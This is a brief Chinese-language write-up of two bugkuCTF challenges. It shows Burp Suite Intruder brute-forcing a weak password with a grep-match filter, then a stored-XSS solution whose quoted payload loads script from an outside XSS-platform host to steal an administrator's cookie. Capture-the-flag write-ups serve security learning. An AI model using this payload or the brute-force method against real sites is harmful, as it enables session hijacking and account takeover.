bugkuCTF
有時間再說,持續(xù)更新
bp
提示:弱密碼top1000?z???
首先,burpsuite—>Intruder—>Sniper爆破該密碼,發(fā)現(xiàn)包長度都一致,爆破不成功。根據(jù)題目提示,字典應(yīng)該是沒有問題的,所以不考慮這個可能。
然后,查看返回包,顯然如果密碼正確,r.code的值就不會是bugku10000,根據(jù)返回包長度都一致,可以推斷,r.code的值為10位
<script>var r = {code: 'bugku10000'}if(r.code == 'bugku10000'){console.log('e');document.getElementById('d').innerHTML = "Wrong account or password!";}else{console.log('0');window.location.href = 'success.php?code='+r.code;} </script>下面需要做的就是過濾掉響應(yīng)內(nèi)容為{code: 'bugku10000'}的包
Burp-Intruder-options-Grep match加上這個內(nèi)容即可。
留言板
xss平臺直接搞個payload放進去,然后管理員會自己訪問,cookie就傳過來了,看樣子是把()過濾成||,不用window.open()就好了。我用的payload:<sCRiPt sRC=//0x.ax/jP7G></sCrIpT>
總結(jié)
- 上一篇: 解决 ssrr端口1080占用
- 下一篇: 让5G提早发挥作用 5G技术4G化